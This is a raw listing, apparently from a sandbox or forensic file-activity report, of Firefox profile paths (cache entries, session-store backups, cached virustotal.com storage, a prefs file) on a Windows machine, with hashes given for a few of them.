SHA512 09e257038d0d45be4f148c56d9f619a2e459df1a148de24d4511f84993ffa0e11a4cfbafe4358b52beaecb7076bec0b61c9d56232bafa3dfc59cc3fbac0cc79d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\208\{5a1b306c-3659-4fd0-a476-e3c1b9a52ad0}.final

MD5 b3331c0f9e9d36df5e9d61993a599156
SHA1 21e64dcf3ed4c0ce9972c59786033dce8ed39bbf
SHA256 be35265a8a1a13abab29a84ee45565e12e3eaaa2062ce700b732805bad9d081c
SHA512 44aebb7ad30a2ab5d4b0f70ab6590271ad8fcde4cba9cccf47309eb48c4d8088bb1d4977701392b36ad4ad2ce990ed26b7b1860d446e347b4f0227f03a5dd487

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\24183

MD5 e8c0f77680992785220a970937d46573
SHA1 7adbaf2612adebca7cc3cc4b72d731a60ae96697
SHA256 db08133aa86ac0ce20bd562f18a0e5cfa200cd346e03ba17c61a968322d6bb83
SHA512 41a5dc9e471f67d36638c4c6875ef1caac69b43a85420a098bdbfddc4669f2e192e7864feedb2f3150d3cdae7bf39af921d3ba3294984230d98b9d385890e5fc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\224\{33412b42-10c4-4afc-905e-c2b8b063e8e0}.final

MD5 9a19d44745ae4fd75d8858c07d4f30dd
SHA1 8aa3bc92258f8c93cd0299b5b28b25f10011b32e
SHA256 f0113ceff1b380b8f5c24ab6cc1586a84abd42227ea5f85e02d57ad622d1177c
SHA512 1fec2a991c275140a4a3d369bcbdbb62b4e110758610f28957b4681df4b733a22f9c94f727648c912128fd9f15941976a545c04bad0f33af6ef1f52c781535d8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\11628


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\25947


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\30350


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\47\{c3e2fcc5-c334-43c0-abff-0af24cf2f52f}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\793


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4004


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\12087


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\31343


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\202\{12bed475-3a17-40ec-bd1e-05279308b3ca}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\21380


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\19047


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\18690


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\193\{31967227-7879-4889-ac8b-b100414fa6c1}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\11722


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\8065


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\19681


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4455


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27685


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\184\{5bd5b984-d1c4-422a-adda-2ada6f8c47b8}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\24826


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\3731


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\227\{a1d408d2-7737-497b-8304-69ec3fb97ae3}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\16626


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\24202


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\3622


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\8976


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\7\{91ca2687-61c6-4a8d-953e-b49e69f4d807}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15813


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\23253


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\171\{26d5e690-a0a7-4165-9ef1-12b5ac07e5ab}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\24882


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\11405


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\43\{9b4b037e-65b8-4b39-81b1-b5516351362b}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\14763


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\21755


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\17649


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\29265


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\3793


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\80\{5da5b792-43fa-477c-8c6a-cf32690bb050}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4950


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\50\{305c0ee0-3b6d-48a3-8cc2-f0f56c6a1732}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\17734


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\175\{bbb306d1-9552-4692-967b-7bb39e5262af}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\15740


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\115\{bb1ae708-6764-4f9b-9bbe-9d9806a9da73}.final


C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\16696


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore.jsonlz4


C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js
